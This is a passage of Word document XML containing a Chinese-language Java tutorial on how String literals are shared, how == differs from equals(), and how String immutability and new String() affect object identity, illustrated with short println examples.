        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类中字符串值都是直接存值的。但像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String str = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”；这种场合下，其字符串值却是保存了一个指向存在栈中数据的引用！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C432F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFA370C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了更好地说明这个问题，我们可以通过以下的几个代码进行验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531E7A16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="533E76B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String str1 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5CD9FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String str2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B23AFC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out.println(str1==str2); //true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531A47B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，我们这里并不用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str1.equals(str2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；的方式，因为这将比较两个字符串的值是否相等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号，根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的说明，只有在两个引用都指向了同一个对象时才返回真值。而我们在这里要看的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否都指向了同一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323E3822" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果说明，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建了两个引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但只创建了一个对象，而且两个引用都指向了这个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC4579" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4401F39F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们再来更进一步，将以上代码改成：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EBEB3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AAC39C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String str1 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C319775" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String str2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C2943" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">str1 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bcd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17CD4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">System.out.println(str1 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> + str2); //bcd, abc  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252BD446" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out.println(str1==str2); //false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7B37FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这就是说，赋值的变化导致了类对象引用的变化，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向了另外一个新对象！而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仍旧指向原来的对象。上例中，当我们将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"bcd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现在栈中没有存放该值的地址，便开辟了这个地址，并创建了一个新的对象，其字符串的值指向这个地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1F54A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BFF548D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事实上，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类被设计成为不可改变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(immutable)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的类。如果你要改变其值，可以，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在运行时根据新值悄悄创建了一个新对象，然后将这个对象的地址返回给原来类的引用。这个创建过程虽说是完全自动进行的，但它毕竟占用了更多的时间。在对时间要求比较敏感的环境中，会带有一定的不良影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B5C72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F6563C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再修改原来代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195706F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB2793C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String str1 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE1CE48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String str2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3980A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14DCA974" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">str1 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bcd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D773E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB476E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String str3 = str1;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4241DBEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out.println(str3); //bcd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739ED76E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBB89FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">String str4 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bcd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A90EC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out.println(str1 == str4); //true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A851F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个对象的引用直接指向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所指向的对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并没有创建新对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改完其值后，再创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并指向因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改值而创建的新的对象。可以发现，这回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也没有创建新的对象，从而再次实现栈中数据的共享。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D45A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7144DD3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们再接着看以下的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E896B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEB1324" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String str1 = new String(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574A477C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String str2 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A5402E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out.println(str1==str2); //false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C0045" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C355EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建了两个引用。创建了两个对象。两个引用分别指向不同的两个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C40625" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2C70F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">String str1 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F67E10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
